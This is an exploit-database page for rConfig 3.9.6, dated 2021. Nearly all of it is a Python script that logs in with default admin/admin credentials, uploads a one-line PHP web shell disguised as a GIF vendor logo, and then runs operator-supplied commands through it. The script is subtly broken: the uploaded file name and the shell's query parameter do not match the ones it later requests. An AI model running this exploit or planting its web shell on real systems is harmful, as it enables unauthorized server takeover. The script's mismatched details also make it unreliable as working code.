Rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (RCE Authenticated)

2021.08.18
ir Ali Seddigh (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|=========================================================================== | # Exploit Title : rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (RCE Authenticated) | | # Author : Ali Seddigh | | # Category : Web Application | | # Software Link : https://www.rconfig.com/ | | # Tested on : [ Windows ~> 10 , Kali Linux ] | | # Version : 3.9.6 | | # Date : 2021-06-12 |=========================================================================== import requests import sys s = requests.Session() host=sys.argv[1] #Enter the hostname cmd=sys.argv[2] #Enter the command def exec_cmd(cmd,host): print "[+]Executing command" path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd) response=requests.get(path) print response.text print "\n[+]You can access shell via below path" print path def file_upload(cmd,host): print "[+]Bypassing file upload" burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"} burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""} burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data) exec_cmd(cmd,host) def login(host,cmd): print "[+]Logging in" burp0_url = "https://"+host+":443/lib/crud/userprocess.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data) file_upload(cmd,host) login(host,cmd) |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top